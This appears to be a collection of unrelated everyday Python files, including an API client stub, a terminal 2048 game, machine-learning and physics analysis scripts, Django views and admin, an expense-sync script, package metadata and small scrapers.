"""Service class for the services resource."""
_NAME = u'services'
def __init__(self, client):
super(ServicecontrolV1.ServicesService, self).__init__(client)
self._method_configs = {
'check': base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'servicecontrol.services.check',
ordered_params=[u'serviceName'],
path_params=[u'serviceName'],
query_params=[],
relative_path=u'v1/services/{serviceName}:check',
request_field=u'checkRequest',
request_type_name=u'ServicecontrolServicesCheckRequest',
response_type_name=u'CheckResponse',
supports_download=False,
),
'report': base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'servicecontrol.services.report',
ordered_params=[u'serviceName'],
path_params=[u'serviceName'],
query_params=[],
relative_path=u'v1/services/{serviceName}:report',
request_field=u'reportRequest',
request_type_name=u'ServicecontrolServicesReportRequest',
response_type_name=u'ReportResponse',
supports_download=False,
),
}
self._upload_configs = {
}
def check(self, request, global_params=None):
"""Checks quota, abuse status etc. to decide whether the given
operation. should proceed. It should be called by the service
before the given operation is executed.
This method requires the `servicemanagement.services.check`
permission on the specified service. For more information, see
[Google Cloud IAM](https://cloud.google.com/iam).
Args:
request: (ServicecontrolServicesCheckRequest) input message
global_params: (StandardQueryParameters, default: None)
global arguments
Returns:
(CheckResponse) The response message.
"""
config = self.GetMethodConfig('check')
return self._RunMethod(
config, request, global_params=global_params)
def report(self, request, global_params=None):
"""Reports an operation to the service control features such as
billing, logging, monitoring etc. It should be called by the
service after the given operation is completed.
This method requires the `servicemanagement.services.report`
permission on the specified service. For more information, see
[Google Cloud IAM](https://cloud.google.com/iam).
Args:
request: (ServicecontrolServicesReportRequest) input message
global_params: (StandardQueryParameters, default: None) global
arguments
Returns:
(ReportResponse) The response message.
"""
config = self.GetMethodConfig('report')
return self._RunMethod(
config, request, global_params=global_params)
|
python
|
#!/usr/bin/env python3
import curses
from random import randrange, choice # generate and place new tile
from collections import defaultdict
letter_codes = [ord(ch) for ch in 'WASDRQwasdrq']
actions = ['Up', 'Left', 'Down', 'Right', 'Restart', 'Exit']
actions_dict = dict(zip(letter_codes, actions * 2))
def get_user_action(keyboard):
char = "N"
while char not in actions_dict:
char = keyboard.getch()
return actions_dict[char]
def transpose(field):
return [list(row) for row in zip(*field)]
def invert(field):
return [row[::-1] for row in field]
class GameField(object):
def __init__(self, height=4, width=4, win=2048):
self.height = height
self.width = width
self.win_value = 2048
self.score = 0
self.highscore = 0
self.reset()
def reset(self):
if self.score > self.highscore:
self.highscore = self.score
self.score = 0
self.field = [[0 for i in range(self.width)] for j in range(self.height)]
self.spawn()
self.spawn()
def move(self, direction):
def move_row_left(row):
def tighten(row): # squeese non-zero elements together
new_row = [i for i in row if i != 0]
new_row += [0 for i in range(len(row) - len(new_row))]
return new_row
def merge(row):
pair = False
new_row = []
for i in range(len(row)):
if pair:
new_row.append(2 * row[i])
self.score += 2 * row[i]
pair = False
else:
if i + 1 < len(row) and row[i] == row[i + 1]:
pair = True
new_row.append(0)
else:
new_row.append(row[i])
assert len(new_row) == len(row)
return new_row
return tighten(merge(tighten(row)))
moves = {}
moves['Left'] = lambda field: \
[move_row_left(row) for row in field]
moves['Right'] = lambda field: \
invert(moves['Left'](invert(field)))
moves['Up'] = lambda field: \
transpose(moves['Left'](transpose(field)))
moves['Down'] = lambda field: \
transpose(moves['Right'](transpose(field)))
if direction in moves:
if self.move_is_possible(direction):
self.field = moves[direction](self.field)
self.spawn()
return True
else:
return False
def is_win(self):
return any(any(i >= self.win_value for i in row) for row in self.field)
def is_gameover(self):
return not any(self.move_is_possible(move) for move in actions)
def draw(self, screen):
help_string1 = '(W)Up (S)Down (A)Left (D)Right'
help_string2 = ' (R)Restart (Q)Exit'
gameover_string = ' GAME OVER'
win_string = ' YOU WIN!'
def cast(string):
screen.addstr(string + '\n')
def draw_hor_separator():
top = '┌' + ('┬──────' * self.width + '┐')[1:]
mid = '├' + ('┼──────' * self.width + '┤')[1:]
bot = '└' + ('┴──────' * self.width + '┘')[1:]
separator = defaultdict(lambda: mid)
separator[0], separator[self.height] = top, bot
if not hasattr(draw_hor_separator, "counter"):
draw_hor_separator.counter = 0
cast(separator[draw_hor_separator.counter])
draw_hor_separator.counter += 1
def draw_row(row):
cast(''.join('│{: ^5} '.format(num) if num > 0 else '| ' for num in row) + '│')
screen.clear()
cast('SCORE: ' + str(self.score))
if 0 != self.highscore:
cast('HGHSCORE: ' + str(self.highscore))
for row in self.field:
draw_hor_separator()
draw_row(row)
draw_hor_separator()
if self.is_win():
cast(win_string)
else:
if self.is_gameover():
cast(gameover_string)
else:
cast(help_string1)
cast(help_string2)
def spawn(self):
new_element = 4 if randrange(100) > 89 else 2
(i, j) = choice([(i, j) for i in range(self.width) for j in range(self.height) if self.field[i][j] == 0])
self.field[i][j] = new_element
def move_is_possible(self, direction):
def row_is_left_movable(row):
def change(i): # true if there'll be change in i-th tile
if row[i] == 0 and row[i + 1] != 0: # Move
return True
if row[i] != 0 and row[i + 1] == row[i]: # Merge
return True
return False
return any(change(i) for i in range(len(row) - 1))
check = {}
check['Left'] = lambda field: \
any(row_is_left_movable(row) for row in field)
check['Right'] = lambda field: \
check['Left'](invert(field))
check['Up'] = lambda field: \
check['Left'](transpose(field))
check['Down'] = lambda field: \
check['Right'](transpose(field))
if direction in check:
return check[direction](self.field)
else:
return False
def main(stdscr):
curses.use_default_colors()
game_field = GameField(win=32)
state_actions = {} # Init, Game, Win, Gameover, Exit
def init():
game_field.reset()
return 'Game'
state_actions['Init'] = init
def not_game(state):
game_field.draw(stdscr)
action = get_user_action(stdscr)
responses = defaultdict(lambda: state)
responses['Restart'], responses['Exit'] = 'Init', 'Exit'
return responses[action]
state_actions['Win'] = lambda: not_game('Win')
state_actions['Gameover'] = lambda: not_game('Gameover')
def game():
game_field.draw(stdscr)
action = get_user_action(stdscr)
if action == 'Restart':
return 'Init'
if action == 'Exit':
return 'Exit'
if game_field.move(action): # move successful
if game_field.is_win():
return 'Win'
if game_field.is_gameover():
return 'Gameover'
return 'Game'
state_actions['Game'] = game
state = 'Init'
while state != 'Exit':
state = state_actions[state]()
curses.wrapper(main)
|
python
|
# https://qiita.com/taigamikami/items/6c69fc813940f838e96c
import numpy as np
import tensorflow as tf
import tensorflow_lattice as tfl
import matplotlib.pyplot as plt
import input_data
# ====================================
# 訓練用のデータ
# ====================================
#x_train = np.arange(-5, 5, 0.2)
#noise = np.random.normal(0, 4, x_train.shape)
#y_train = np.square(x_train) + noise
data = input_data.read_data("train")
x_train = data.T[0]
y_train = data.T[1]
batch_size = len(x_train)
# input_fn = tf.estimator.inputs.numpy_input_fn(
# {"x": x_train}, y_train, batch_size=batch_size, num_epochs=None, shuffle=True)
train_input_fn = tf.estimator.inputs.numpy_input_fn(
{"x": x_train}, y_train, batch_size=batch_size, num_epochs=1000, shuffle=False)
# ====================================
# 訓練(トレーニング)
# ====================================
# 機能のリストを宣言する。 1つの数値機能しかありません。 より複雑で有用な他の多くのタイプの列があります。
feature_columns = [
tf.feature_column.numeric_column("x")
]
# Hyperparameters.
num_keypoints = 10
# hparams = tfl.CalibratedRtlHParams(
# num_keypoints=num_keypoints,
# num_lattices=5,
# lattice_rank=2,
# learning_rate=0.01)
hparams = tfl.CalibratedLinearHParams(
num_keypoints=num_keypoints,
num_lattices=10,
# lattice_rank=2,
learning_rate=0.1)
# Set feature monotonicity.
#hparams.set_feature_param('x', 'monotonicity', -1)
# Define keypoint init.
keypoints_init_fns = {
'x': lambda: tfl.uniform_keypoints_for_signal(num_keypoints,
input_min=-5.0,
input_max=5.0,
output_min=0.0,
output_max=25.0),
}
print("keypoints_init_fns: %r" % keypoints_init_fns)
# ====================================
# 訓練
# ====================================
# lattice_estimator = tfl.calibrated_lattice_regressor(
# feature_columns=feature_columns,
# hparams=hparams,
# keypoints_initializers_fn=keypoints_init_fns
# )
lattice_estimator = tfl.calibrated_linear_regressor(
feature_columns=feature_columns,
hparams=hparams,
keypoints_initializers_fn=keypoints_init_fns
)
# Train!
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": x_train},
y=y_train,
batch_size=batch_size,
num_epochs=1000,
shuffle=False)
train_metrics = lattice_estimator.train(input_fn=train_input_fn)
# ====================================
# モデルの評価
# ====================================
eval_metrics = lattice_estimator.evaluate(input_fn=train_input_fn)
print("train metrics: %r"% eval_metrics)
# ====================================
# 検証用データ
# ====================================
eval_data = input_data.read_data("eval")
x_eval = eval_data.T[0]
y_eval = eval_data.T[1]
#
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
{"x": x_eval}, y_eval, batch_size=4, num_epochs=1000, shuffle=False)
eval_metrics = lattice_estimator.evaluate(input_fn=eval_input_fn)
print("eval metrics: %r"% eval_metrics)
# ====================================
# 予測
# ====================================
predict_data = input_data.read_data("predict")
x_predict = predict_data.T[0]
predict_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": x_predict},
y=None,
batch_size=batch_size,
num_epochs=1,
shuffle=False
)
predict_results = list(lattice_estimator.predict(input_fn=predict_input_fn))
# ====================================
# データを図表に表示する
# ====================================
fig = plt.figure()
ax1 = fig.add_subplot(1, 1, 1)
ax1.scatter(x_train, y_train)
y_predict = np.array([])
for prediction in predict_results:
y_predict = np.append(y_predict, prediction["predictions"][0])
ax1.plot(x_eval, y_predict, "r-")
plt.show()
|
python
|
config = {
"--acoustic-scale":[0.1,float],
"--allow-partial":["false",str],
"--beam":[13,int],
"--beam-delta":[0.5,float],
"--delta":[0.000976562,float],
"--determinize-lattice":["true",str],
"--hash-ratio":[2,int],
"--lattice-beam":[8,int],
"--max-active":[7000,int],
"--max-mem":[50000000,int],
"--min-active":[200,int],
"--minimize":["false",str],
"--phone-determinize":["true",str],
"--prune-interval":[25,int],
"--word-determinize":["true",str],
"--word-symbol-table":["",str]
}
|
python
|
"""
Odoo client using Openerp proxy
"""
# https://pypi.org/project/openerp_proxy/
from openerp_proxy import Client as erpClient
class Client():
"""
Odoo client
"""
def __init__(self, username:str, password:str = '', database:str = '', host:str = '', port:int = 443, protocol:str = 'json-rpcs'):
"""
Initialize parameters here
"""
if len(username) == 0:
raise ValueError('Missing username argument')
self.username = username
self.password = password
self.database = database
self.host = host
self.port = port
self.protocol = protocol
self.client = None # Set this in connect or enter
self.user = None
def connect(self):
"""
Connect to Odoo
"""
self.client = erpClient(
host=self.host,
dbname=self.database,
user=self.username,
pwd=self.password,
protocol=self.protocol,
port=self.port)
# Check connection by fetching user name
self.user = self.client.user
def __enter__(self):
self.connect()
return self
def __exit__(self, type, value, traceback):
pass
def search(self, db_name, filters):
"""
Search ids for db_name using filters
"""
return self.client[db_name].search(filters)
def search_read(self, db_name, filters):
"""
Search data for db_name using filters
"""
return self.client[db_name].search_read(filters)
def read(self, db_name, ids, fields=None):
"""
Read data using ids list or int. Fields is optional
"""
return self.client[db_name].read(ids, fields)
def write(self, db_name, ids, field):
"""
Write data to db_name with id
"""
return self.client[db_name].write(ids, field)
def create(self, db_name, fields):
return self.client[db_name].create(fields)
def start_tracking(self, args):
return self.client['project.task'].start_tracking(args)
def terminate_tracking(self, args):
return self.client['project.task'].terminate_tracking(args)
|
python
|
import ROOT
import numpy as np
# fast index lookup
from melp.libs.misc import index_finder
def save_histo(filename: str, dt_dict: dict):
histo_file = ROOT.TFile.Open(filename, "RECREATE")
for keys in dt_dict.keys():
name_z = str(keys) + "z"
name_phi = str(keys) + "phi"
histo_file.WriteObject(dt_dict[keys][0], name_z)
histo_file.WriteObject(dt_dict[keys][1], name_phi)
def read_histo(filename: str) -> dict:
global histo_file
histo_file = ROOT.TFile.Open(filename, "READ")
dt_dict = {}
for key in histo_file.GetListOfKeys():
h = key.ReadObj()
name = h.GetName()
dict_key = name.replace("_z", "")
dict_key = int(dict_key.replace("_phi", ""))
if dict_key not in dt_dict.keys():
dt_dict[dict_key] = [None, None]
if "z" in name:
dt_dict[dict_key][0] = h
# print(h)
elif "phi" in name:
dt_dict[dict_key][1] = h
return dt_dict
# ---------------------------------------
#
# Generates dictionary with ROOT TH1D Histogramms
# -> dict[tileid] = [hist_z, hist_pih]
#
def fill_dt_histos(detector, ttree_mu3e, histo_options: tuple) -> dict:
cluster_counter = 0
hist_dict = {}
nbins, lo, hi = histo_options
# Generating empty histos:
for tile in detector.TileDetector.tile:
histo_name_z = str(tile) + "_z"
histo_name_phi = str(tile) + "_phi"
hist_dict[tile] = [ROOT.TH1D(histo_name_z, histo_name_z, nbins, lo, hi),
ROOT.TH1D(histo_name_phi, histo_name_phi, nbins, lo, hi)]
# tilehits = ROOT.vector('int')()
# tilehitstime = ROOT.vector('double')()
# ttree_mu3e.SetBranchStatus("tilehit_tile", 1)
# ttree_mu3e.SetBranchStatus("tilehit_time", 1)
# ttree_mu3e.SetBranchAddress("tilehit_tile", tilehits)
# ttree_mu3e.SetBranchAddress("tilehit_time", tilehitstime)
for frame in range(ttree_mu3e.GetEntries()):
ttree_mu3e.GetEntry(frame)
# Printing status info
if frame % 10000 == 0:
print("Searching clusters. Progress: ", np.round(frame / ttree_mu3e.GetEntries() * 100), " % , Found: ",
cluster_counter, end='\r')
# TODO: index_finder cant handle multiple events on one tile in one frame!!!
# --> skipping frame (looses some data)
# Analyzing frame
for hit_tile_index in range(len(ttree_mu3e.tilehit_tile)):
hit_tile = ttree_mu3e.tilehit_tile[hit_tile_index]
# -----------------------------
# Look for clusters in z-dir
neighbour_z_id = detector.TileDetector.getNeighbour(hit_tile, "right")
if neighbour_z_id in ttree_mu3e.tilehit_tile and neighbour_z_id is not False:
# find associated tile hit
hit_tile_assoc = index_finder(list(ttree_mu3e.tilehit_tile), neighbour_z_id)
# workaround for multiple hits in the same tile
try:
hit_tile_assoc = int(*hit_tile_assoc)
except (TypeError, ValueError):
continue
# calculate dt
# TODO: TOF maybe with edep ?
hit_time_1 = ttree_mu3e.tilehit_time[hit_tile_index] # + detector.TileDetector.tile[hit_tile].dt_truth
hit_time_2 = ttree_mu3e.tilehit_time[hit_tile_assoc] # + detector.TileDetector.tile[
# neighbour_z_id].dt_truth
dt = hit_time_2 - hit_time_1
# Fill histogram
hist_dict[hit_tile][0].Fill(dt)
cluster_counter += 1
# -----------------------------
# Look for clusters in phi-dir
neighbour_phi_id = detector.TileDetector.getNeighbour(hit_tile, "up")
if neighbour_phi_id in ttree_mu3e.tilehit_tile and neighbour_phi_id is not False:
hit_tile = ttree_mu3e.tilehit_tile[hit_tile_index]
# find associated tile hit
hit_tile_assoc = index_finder(list(ttree_mu3e.tilehit_tile), neighbour_phi_id)
# workaround for multiple hits in the same tile
try:
hit_tile_assoc = int(*hit_tile_assoc)
except (TypeError, ValueError):
continue
# calculate dt
# TODO: TOF maybe with edep ?
hit_time_1 = ttree_mu3e.tilehit_time[hit_tile_index] # + detector.TileDetector.tile[hit_tile].dt_truth
hit_time_2 = ttree_mu3e.tilehit_time[hit_tile_assoc] # + detector.TileDetector.tile[
# neighbour_phi_id].dt_truth
dt = hit_time_2 - hit_time_1
# Fill histogram
hist_dict[hit_tile][1].Fill(dt)
cluster_counter += 1
print("Searching clusters. Progress: ", 100, " % , Found: ", cluster_counter)
return hist_dict
|
python
|
import logging
from collections import namedtuple
import magic
from io import BytesIO
from django.views.generic import DetailView
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse
import matplotlib
import matplotlib.pyplot
import aplpy
import astropy
from scheduler.models import Workflow
matplotlib.use('agg')
astropy.log.setLevel('ERROR')
logger = logging.getLogger(__name__)
filemagic = magic.Magic() # flags=magic.MAGIC_MIME_TYPE)
class FitsView(DetailView):
"""
Returns an rendered image. uses path keyword argument. Only
allowes files which are in te settings.RESULTS_DIR folder somewhere.
"""
model = Workflow
def render_to_response(self, context, **kwargs):
size = int(self.request.GET.get('size', 5))
vmin = float(self.request.GET.get('vmin', 0))
vmax = float(self.request.GET.get('vmax', 0.1))
colorbar = (self.request.GET.get('colorbar', 'True').lower() != 'false')
fullpath = self.object.get_result(self.kwargs['path'])
figure = matplotlib.pyplot.figure(figsize=(size, size))
if colorbar:
subplot = [0.0, 0.0, 0.9, 1]
else:
subplot = [0.0, 0.0, 1, 1]
try:
fig = aplpy.FITSFigure(str(fullpath),
figure=figure,
subplot=subplot,
figsize=(size, size))
except IOError as e:
matplotlib.pyplot.text(0.1, 0.8, str(e))
else:
fig.show_colorscale(vmin=vmin, vmax=vmax)
if colorbar:
fig.add_colorbar()
fig.colorbar.set_font(size='xx-small')
fig.axis_labels.hide()
fig.tick_labels.hide()
fig.ticks.hide()
buf = BytesIO()
figure.canvas.print_figure(buf, format='png')
return HttpResponse(buf.getvalue(), content_type='image/png')
DirItem = namedtuple('DirItem', ['fullpath', 'name', 'type', 'size',
'modified', 'is_image'])
class SomethingView(DetailView):
"""
Will redirect to correct view according to file type.
Will render error page if file type is not understood.
"""
model = Workflow
template_name = 'viewer/unknowntype.html'
def get_context_data(self, **kwargs):
context = super(SomethingView, self).get_context_data(**kwargs)
fullpath = self.object.get_result(self.kwargs['path'])
context['type'] = filemagic.id_filename(str(fullpath))
context['path'] = self.kwargs['path']
return context
def render_to_response(self, context, **response_kwargs):
type_ = context['type']
if type_.startswith("FITS image data"):
return HttpResponseRedirect(reverse('scheduler:viewer_fits',
kwargs={'pk': self.object.id,
'path': self.kwargs['path']}))
if type_.startswith("ASCII text") or \
type_.startswith('UTF-8 Unicode text'):
return HttpResponseRedirect(reverse('scheduler:viewer_text',
kwargs={'pk': self.object.id,
'path': self.kwargs['path']}))
if type_.startswith('PNG image data') or \
type_.startswith('JPEG image data') or \
type_.startswith('HTML document'):
return HttpResponseRedirect(f"{self.object.public_serve()}/outdir/{self.kwargs['path']}")
return super(SomethingView, self).render_to_response(context)
class TextView(DetailView):
model = Workflow
template_name = 'viewer/textfile.html'
def get_context_data(self, **kwargs):
context = super(TextView, self).get_context_data(**kwargs)
path = self.kwargs['path']
fullpath = f"{self.object.outdir()}/{path}"
with open(fullpath, 'r') as f:
context['path'] = path
context['content'] = ''.join(f.readlines())
return context
class Js9View(DetailView):
"""
Will redirect to correct view according to file type.
Will render error page if file type is not understood.
"""
model = Workflow
template_name = 'viewer/js9.html'
def render_to_response(self, context, **response_kwargs):
response = super().render_to_response(context, **response_kwargs)
response["Access-Control-Allow-Origin"] = "js9.si.edu"
response["Access-Control-Allow-Methods"] = "GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "X-Requested-With, Content-Type"
return response
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['path'] = f"{self.object.public_serve()}/outdir/{self.kwargs['path']}"
return context
|
python
|
from django.contrib import admin
from django.contrib.auth import get_user_model
from django.contrib.auth.admin import UserAdmin
from .models import Favorite, Subscription
User = get_user_model()
class FavoriteAdmin(admin.ModelAdmin):
model = Favorite
list_display = ('user', 'recipe')
class SubscriptionAdmin(admin.ModelAdmin):
model = Subscription
list_display = ('user', 'author')
class UserAdmin(UserAdmin):
model = User
list_display = ('email', 'username', 'is_staff', 'is_active',)
list_filter = ('email', 'username', 'is_staff', 'is_active',)
fieldsets = (
(None, {'fields': ('username', 'email', 'password')}),
('Description', {'fields': ('first_name', 'last_name')}),
('Permissions', {'fields': ('is_staff', 'is_active')}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': (
'email', 'password1', 'password2', 'is_staff', 'is_active'
)
}),
)
search_fields = ('email', 'username')
ordering = ('email',)
admin.site.unregister(User)
admin.site.register(Favorite, FavoriteAdmin)
admin.site.register(Subscription, SubscriptionAdmin)
admin.site.register(User, UserAdmin)
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 7 18:40:45 2019
@author: ryder
"""
#%%
import os
import pandas as pd
from pynabapi import YnabClient
import pygsheets
import datetime
import time
import re
#%%
# should create google_ledger object
with open('keys/google_expenses_sheet_key.txt', 'r') as g_sheet_id_key_txt:
GOOGLE_SHEET_ID_KEY = g_sheet_id_key_txt.readline().strip()
gc = pygsheets.authorize(service_account_file='keys/service_account_credentials.json')
sh = gc.open_by_key(GOOGLE_SHEET_ID_KEY)
#%% GOOGLE FUNCTIONS
def load_and_process_sheet(sh=sh, tab=0):
w = sh.worksheet('index', tab)
ret_df = w.get_as_df(has_header=True, start='A2')
# dollars = ret_df.Amount.astype(str).str.extract(r'(\d+)')
# ret_df.loc[:, 'Amount'] = ret_df.Amount.astype(str).str.extract(r'(\d+)')
ret_df.Amount = ret_df.Amount.astype(str).str.extract(r'(\d+)')
# ret_df.loc[:, 'Timestamp'] = pd.to_datetime(ret_df.Timestamp)
ret_df.Timestamp = pd.to_datetime(ret_df.Timestamp)
return(ret_df.reset_index(drop=True))
# return(dollars)
def load_and_process_all_sheets(sh=sh):
colnames = ['Timestamp', 'Payee', 'Amount', 'Purpose', 'Description']
all_sheets = pd.DataFrame(columns = colnames)
for sheetnum in range(len(sh.worksheets())):
curr_sheet = load_and_process_sheet(sh, sheetnum)
sheet_title = re.search(r'(?<=Worksheet ).+(?= index)',
str(sh.worksheets()[1])).group(0)
if curr_sheet.shape[1] != 5:
raise Exception(f'Worksheet {sheet_title} (index {sheetnum} has the '
f'wrong dimensions.')
# print(curr_sheet.columns)
all_sheets = all_sheets.append(curr_sheet)
return(all_sheets.sort_values('Timestamp', ascending=False))
#%%
def get_last_trns_date(sh=sh, payee_name = 'Ryder', format = 'datetime'):
# Get all transactions in Google Sheets
__all_trans = load_and_process_all_sheets()
__max_date = (
__all_trans
.loc[__all_trans.Payee == payee_name]['Timestamp']
.max()
)
if format == 'datetime':
return(__max_date)
elif format == 'string':
return(__max_date.strftime('%Y-%m-%d'))
#%%
def get_trans_from_ynab(sh=sh, since_date=get_last_trns_date()):
# since_date = get_last_trns_date()
with open('keys/ynab_api_key.txt', 'r') as y_api_key_txt:
YNAB_CLIENT_KEY = y_api_key_txt.readline().strip()
with open('keys/ynab_budget_id.txt', 'r') as y_bud_id_txt:
YNAB_BUDGET_ID = y_bud_id_txt.readline().strip()
yc = YnabClient(YNAB_CLIENT_KEY)
all_transactions = yc.get_transaction(budget_id=YNAB_BUDGET_ID)
column_names = ['timestamp', 'payee', 'memo', 'flag', 'amount']
listofitems = []
for item in all_transactions:
listofitems.append(str(item.date) + ',,,' +
str(item.payee_name) + ',,,' +
str(item.memo) + ',,,' +
str(item.flag_color) + ',,,' +
str(item.amount)
)
ynab_df = pd.Series(listofitems).str.split(',,,', expand=True)
ynab_df.columns = column_names
ynab_df.timestamp = pd.to_datetime(ynab_df.timestamp)
ynab_df.amount = ynab_df.amount.astype(int) / -1000
ynab_df_filter = (
ynab_df[(ynab_df.timestamp >= since_date) &
(ynab_df.flag.isin(['red', 'purple']))]
)
ret_df = pd.DataFrame(columns = ['Timestamp', 'Payee',
'Amount', 'Purpose',
'Description'])
ret_df.Timestamp = ynab_df_filter.timestamp.astype(str) + ' 00:00:00'
ret_df.Payee = 'Ryder'
ret_df.Amount = ynab_df_filter.amount.round(0).astype(int).astype(str)
# apply for us for red flags, and for you for purple flags
ret_df.Purpose = (ynab_df_filter.flag.apply(lambda x:
'for us' if x == 'red' else 'for you' if x == 'purple' else '-1'))
ret_df.Description = (
(ynab_df_filter.payee + ' - ' + ynab_df_filter.memo)
.str.replace(' - None', '')
)
return(ret_df)
def get_expenses_from_google(sh=sh, since_date='1900-01-01'):
colnames = ['Timestamp', 'Payee', 'Amount', 'Purpose', 'Description']
all_sheets = pd.DataFrame(columns = colnames)
for sheetnum in range(len(sh.worksheets())):
curr_sheet = load_and_process_sheet(sh, sheetnum)
sheet_title = re.search(r'(?<=Worksheet ).+(?= index)',
str(sh.worksheets()[1])).group(0)
if curr_sheet.shape[1] != 5:
raise Exception(f'Worksheet {sheet_title} (index {sheetnum} has the '
f'wrong dimensions.')
# print(curr_sheet.columns)
all_sheets = all_sheets.append(curr_sheet)
since_date_datetime = datetime.datetime.strptime(since_date, '%Y-%m-%d')
ret_expenses_from_google = (
all_sheets
.loc[all_sheets.Timestamp >= since_date_datetime]
.sort_values('Timestamp', ascending = False)
)
ret_expenses_from_google.Timestamp = (
ret_expenses_from_google.Timestamp.astype(str)
)
return(ret_expenses_from_google)
#%%
def get_new_ynab_expenses_to_upload():
# Get most recent date from Google expenses
since_date=get_last_trns_date(format='string')
# Get most recent Google shared expenses
recent_from_gs = get_expenses_from_google(since_date=since_date)
# Get my recent YNAB expenses
recent_from_ynab = get_trans_from_ynab(since_date=since_date)
# Set operation: return only those YNAB expenses NOT also in Google sheets
in_ynab_not_google = (
recent_from_ynab.merge(recent_from_gs, how = 'left', indicator = True)
.query('_merge == \'left_only\'')
.drop('_merge', 1)
)
return(in_ynab_not_google)
#%%
def append_to_expenses_sheet(expenses_to_upload):
print('')
print(expenses_to_upload)
print('')
this_month = sh.worksheet('index', 0)
while True:
decision = input('Upload to Expenses Tracker? y/n >> ')
if decision[0].lower() == 'y':
print('')
for index, row in expenses_to_upload.iterrows():
row_list = [row.Timestamp, row.Payee, row.Amount,
row.Purpose, row.Description]
this_month.append_table(row_list)
print(f'Appending ${float(row.Amount):.0f} - {row.Description} to tracker.')
print(f'\nUploaded ${expenses_to_upload.Amount.astype(float).sum():.0f} ' \
f'over {expenses_to_upload.shape[0]} transactions.')
break
elif decision[0].lower() == 'n':
print('Not entering.')
break
else:
print(f'Did not understand entry ({decision}). Try again.')
def archive_sheet_and_clear(sheet=sh):
w = load_and_process_sheet(sh, tab=0)
date_max = w.Timestamp.max().strftime('%m/%d/%Y')
date_min = w.Timestamp.min().strftime('%m/%d')
tab_title = date_min + '-' + date_max
wks = sh.worksheet('index', 0)
sh.add_worksheet(tab_title, src_worksheet=wks)
wks.clear(start='A3')
def show_spender_information(sheet=sh):
w_df = load_and_process_sheet(sheet, tab=0)
spender_list = w_df.Payee.unique()
amounts_list = []
for i, name in enumerate(spender_list):
total_shared_transactions_amt = w_df[w_df.Purpose == 'for us'].sum()
spenders_shared_transactions_amt = (
w_df[(w_df.Payee == name) & w_df.Purpose == 'for us']
)
print(total_shared_transactions_amt)
|
python
|
name = 'omnifig'
long_name = 'omni-fig'
version = '0.6.3'
url = 'https://github.com/felixludos/omni-fig'
description = 'Universal configuration system for common execution environments'
author = 'Felix Leeb'
author_email = '[email protected]'
license = 'MIT'
readme = 'README.rst'
packages = ['omnifig']
import os
try:
with open(os.path.join(os.path.abspath(os.path.dirname(os.path.dirname(__file__))), 'requirements.txt'), 'r') as f:
install_requires = f.readlines()
except:
install_requires = ['pyyaml', 'C3Linearize', 'omnibelt']
del os
entry_points = {'console_scripts': 'fig = omnifig.top:entry'}
|
python
|
import sys
import dataset
from datetime import datetime
from dateutil.rrule import rrule, MONTHLY
from dateutil.relativedelta import relativedelta
def process(username, metric, stream_limit):
# gets all artists and their respective daily play counts
db = dataset.connect('sqlite:///last-fm.db')
total = db[username].count()
timeframe = db.query('SELECT MIN(timestamp), MAX(timestamp) FROM %s' % username).next()
mintime = datetime.fromtimestamp(timeframe['MIN(timestamp)'])
maxtime = datetime.fromtimestamp(timeframe['MAX(timestamp)'])
timeframe = len([dt for dt in rrule(MONTHLY, dtstart=mintime, until=maxtime)])
sql = 'SELECT DISTINCT {0} FROM {1} GROUP BY {0}, play_year, play_month HAVING count({0}) > {2}'.format(metric, username, stream_limit)
result = db.query(sql)
artists = []
for row in result:
artists.append(row[metric])
artists = '(%s)' % str(artists)[1:-1]
sql = 'SELECT {0}, timestamp, count({0}) FROM {1} GROUP BY {0}, play_year, play_month HAVING {0} IN {2}'.format(metric, username, artists)
result = db.query(sql)
streams = {}
for row in result:
artist = row[metric]
if artist not in streams:
streams[artist] = [0 for i in range(timeframe)]
current = datetime.fromtimestamp(int(row['timestamp']))
elapsed = len([dt for dt in rrule(MONTHLY, dtstart=mintime, until=current)])
if streams[artist][elapsed - 1] == 0:
streams[artist][elapsed - 1] = row['count(%s)' % metric]
else:
streams[artist][elapsed] = row['count(%s)' % metric]
if len(sys.argv) > 2 and sys.argv[2] == '--other':
sql = 'SELECT COUNT(*) AS count, timestamp FROM {0} WHERE {1} NOT IN {2} GROUP BY play_year, play_month'.format(username, metric, artists)
result = db.query(sql)
streams['other'] = [0 for i in range(timeframe)]
for row in result:
current = datetime.fromtimestamp(int(row['timestamp']))
elapsed = len([dt for dt in rrule(MONTHLY, dtstart=mintime, until=current)])
if streams['other'][elapsed - 1] == 0:
streams['other'][elapsed - 1] = row['count']
elif elapsed != len(streams):
streams['other'][elapsed] = row['count']
with open('scrobble-streamgraph/stream-data.csv', 'w') as csv:
csv.write('key,value,date\n')
for i in range(timeframe):
current = mintime + relativedelta(months=i)
for artist in streams:
try:
csv.write('%s,%s,%s\n' % (artist.replace(',', ''), streams[artist][i], '%s/01/%s' % (current.month, str(current.year)[2:])))
except UnicodeEncodeError:
pass
if __name__ == '__main__':
try:
user = sys.argv[1]
except IndexError:
print("[ERROR] No last.fm username specified.")
quit()
try:
stream_limit = sys.argv[2]
except IndexError:
print("[ERROR] No scrobble minimum specified.")
quit()
try:
int(stream_limit)
except ValueError:
print("[ERROR] Scrobble minimum must be an integer.")
quit()
metric = 'artist'
processor.process(user, metric, stream_limit)
|
python
|
import requests
from datetime import datetime
aq = []
def scrap():
url = "http://vc8006.pythonanywhere.com/api/"
response = requests.request("GET", url)
r = response.json()
for i in range(1,31):
aq.append(r[-i]['AQI'])
# print(r[-i])
# print(response.text)
print(aq)
scrap()
|
python
|
import gym
from griddly import GymWrapperFactory
from griddly.RenderTools import RenderToFile
if __name__ == '__main__':
# A nice tool to save png images
file_renderer = RenderToFile()
# This is what to use if you want to use OpenAI gym environments
wrapper = GymWrapperFactory()
# There are two levels here
level = 0
wrapper.build_gym_from_yaml('GameOfLife', 'game-of-life.yaml', level=level)
# Create the Environment
env = gym.make(f'GDY-GameOfLife-v0')
observation = env.reset()
